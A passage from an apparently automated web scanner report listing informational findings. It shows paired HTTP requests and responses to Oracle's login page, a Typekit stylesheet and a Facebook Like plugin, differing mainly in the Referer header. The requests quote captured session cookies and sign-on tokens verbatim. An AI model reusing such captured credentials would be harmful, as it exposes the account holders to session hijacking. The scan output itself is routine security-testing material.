Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:56 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?purl=http%3A%2F%2Fblogs.oracle.com%2Fotn%2F&isVid=1
Content-Length: 0
Date: Tue, 06 Sep 2011 16:12:54 GMT
Server:

Request 2

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:56 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?isVid=1
Content-Length: 0
Date: Tue, 06 Sep 2011 16:13:07 GMT
Server:


17.4. https://login.oracle.com/mysso/signon.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request 1

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
Content-Length: 2822
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/
Content-Length: 14934


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...
<a href=" https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
" class="SignupLink">Sign Up</a> for a free Oracle Web account
</div>
<div class="HelpInst"><a href=" http://www.oracle.com/us/corporate/contact/manage-your-account-070504.html
" class="HelpInstlink"> Need Help?
</a></div>
</div>
</div>
<div class="gb-b"><span class="gb-b-l"></span><span class="gb-b-r"></span></div>
</div>
<div class="pwrdbytxt"> Powered by Oracle Access Manager 11g
</div>
</div>
<div class="footer-info"><div> This site is intended solely for use by Oracle's authorized users. Use of this site is subject to the Legal Notices, Terms for Use and Privacy Statement located on this site. Use of the site by customers and partners, if authorized, is also subject to the terms of your contract(s) with Oracle. Use of this site by Oracle employees is also subject to company policies, including the Code of Conduct. Unauthorized access or breach of these terms may result in termination of your authorization to use this site and/or civil and criminal penalties.
</div></div>
</div>
</div>
<div class="t-b">
<span class="tb-l-corner"></span>
<span class="tb-r-corner"></span>
</div>
</div>
<div>
<div class="footer-content">
<a href=" http://www.oracle.com/us/corporate/index.html
" class="footer-tagline"> Hardware and Software. Engineered to work together
</a>
</div>
<div class="footer-legalnote-container">
<span class="legalese"> <a href=" ht
...[SNIP]...

Request 2

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2822
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXJTh6uHK6EVADUS1EHWFB01t_mg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:47 GMT; path=/
Content-Length: 13718


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...
<a href=" https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
" class="SignupLink">Sign Up</a> for a free Oracle Web account
</div>
<div class="HelpInst"><a href=" http://www.oracle.com/us/corporate/contact/manage-your-account-070504.html
" class="HelpInstlink"> Need Help?
</a></div>
</div>
</div>
<div class="gb-b"><span class="gb-b-l"></span><span class="gb-b-r"></span></div>
</div>
<div class="pwrdbytxt"> Powered by Oracle Access Manager 11g
</div>
</div>
<div class="footer-info"><div> This site is intended solely for use by Oracle's authorized users. Use of this site is subject to the Legal Notices, Terms for Use and Privacy Statement located on this site. Use of the site by customers and partners, if authorized, is also subject to the terms of your contract(s) with Oracle. Use of this site by Oracle employees is also subject to company policies, including the Code of Conduct. Unauthorized access or breach of these terms may result in termination of your authorization to use this site and/or civil and criminal penalties.
</div></div>
</div>
</div>
<div class="t-b">
<span class="tb-l-corner"></span>
<span class="tb-r-corner"></span>
</div>
</div>
<div>
<div class="footer-content">
<a href=" http://www.oracle.com/us/corporate/index.html
" class="footer-tagline"> Hardware and Software. Engineered to work together
</a>
</div>
<div class="footer-legalnote-container">
<span class="legalese"> <a href=" http://www.oracle.com/us/corporate/index.html
">About Oracle</a> |
<a href=" http://www.oracle.com/us/corporate/contact/index.htm
">Contact Us</a> |
<a href=" http://www.oracle.com/us/legal/index.html
">Legal Notices and Terms of Use</a> |
<a href=" http://www.oracle.com/us/legal/privacy/index.html
">Privacy Policy</a>
</span>
</div>
</div>
</div>
<div class="Mwrapper" div="mobile_content_id">
<div class="Mlogo-header">
<a href=" http://www.oracle.com/index.html
" class="Mlogolink" tabindex=1><img src="/mysso/sso_loginui/ip-o-logo.gif" alt="Oracle"/></a>
</div>
<div class="Mgb-m">

...[SNIP]...

17.5. http://use.typekit.com/k/ghj6ovz-d.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/ghj6ovz-d.css

Request 1

GET /k/ghj6ovz-d.css?3bb2a6e53c9684ffdc9a9afe135b2a62d0c5cfebd5c62bc6cb5953dcc9ca04fb597b7e6e2ad3fdc6e36d4a13bd5d9d37c660a1b5bd1f9d15d65cc5dad650b9578ee036f96df833257eb13365974f27fe5ca4a0c12d081e4cc3 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 06 Sep 2011 15:33:57 GMT
ETag: "47560735+gzip"
Expires: Tue, 06 Sep 2011 15:38:57 GMT
Last-Modified: Wed, 31 Aug 2011 18:28:25 GMT
Server: ECS (sjo/5228)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 229249

/*{"mac":"1:8babe3829692f100b3e2b6a0768ccb884267a6213722f815194773da54ab2b25","version":"5786697","created":"2011-08-31T18:28:31Z","k":"0.9.13"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Droid Sans
* @vendorname Google Android
* @vendorurl http://www.android.com/
* @licenseurl http://typekit.com/fonts/48dc114a2a/eula
*
* @name Myriad Pro
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/8e02145c28/eula
*
* @name Myriad Pro Semi Condensed
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/1bc23aa081/eula
*
* (c) 2011 Typekit, Inc.
*/

@font-face {
font-family:"droid-sans-1";
src:url(data:font/opentype;base64,
...[SNIP]...

Request 2

GET /k/ghj6ovz-d.css?3bb2a6e53c9684ffdc9a9afe135b2a62d0c5cfebd5c62bc6cb5953dcc9ca04fb597b7e6e2ad3fdc6e36d4a13bd5d9d37c660a1b5bd1f9d15d65cc5dad650b9578ee036f96df833257eb13365974f27fe5ca4a0c12d081e4cc3 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 06 Sep 2011 15:34:02 GMT
Expires: Tue, 06 Sep 2011 15:39:02 GMT
Server: ECS (sjo/5228)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

17.6. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10f1711d%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.13.37
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:02 GMT
Content-Length: 32207

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e663d2e3f3cf4137348376" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Why Oracle Bought E-Commerce Company ATG</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 6 others recommend this.</span><span class="connect_widget_not_connected_text">6 recommendations. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=readwriteweb.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_sp
...[SNIP]...

Request 2

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10f1711d%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.58
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 32045

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e663d361be367684251565" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Why Oracle Bought E-Commerce Company ATG</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 6 others recommend this.</span><span class="connect_widget_not_connected_text">6 recommendations. 
<a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_sp
...[SNIP]...

17.7. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

Summary

Severity:   Information
Confidence:   Firm
